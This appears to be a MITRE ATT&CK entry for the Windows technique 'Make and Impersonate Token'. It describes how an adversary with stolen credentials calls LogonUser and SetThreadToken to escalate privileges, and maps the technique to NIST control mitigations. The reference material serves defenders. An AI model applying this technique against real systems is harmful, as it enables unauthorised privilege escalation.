Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the LogonUser function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.
This behavior is distinct from Token Impersonation/Theft in that this refers to creating a new user token instead of stealing or duplicating an existing one.
View in MITRE ATT&CK®| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| CM-06 | Configuration Settings | mitigates | T1134.003 | Make and Impersonate Token | |
| CM-05 | Access Restrictions for Change | mitigates | T1134.003 | Make and Impersonate Token | |
| IA-13 | Identity Providers and Authorization Servers | mitigates | T1134.003 | Make and Impersonate Token | |
| IA-02 | Identification and Authentication (Organizational Users) | mitigates | T1134.003 | Make and Impersonate Token | |
| AC-02 | Account Management | mitigates | T1134.003 | Make and Impersonate Token | |
| AC-03 | Access Enforcement | mitigates | T1134.003 | Make and Impersonate Token | |
| AC-05 | Separation of Duties | mitigates | T1134.003 | Make and Impersonate Token | |
| AC-06 | Least Privilege | mitigates | T1134.003 | Make and Impersonate Token |
| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name | Notes |
|---|---|---|---|---|---|
| action.hacking.variety.Use of stolen creds | Use of stolen or default authentication credentials (including credential stuffing) | related-to | T1134.003 | Make and Impersonate Token |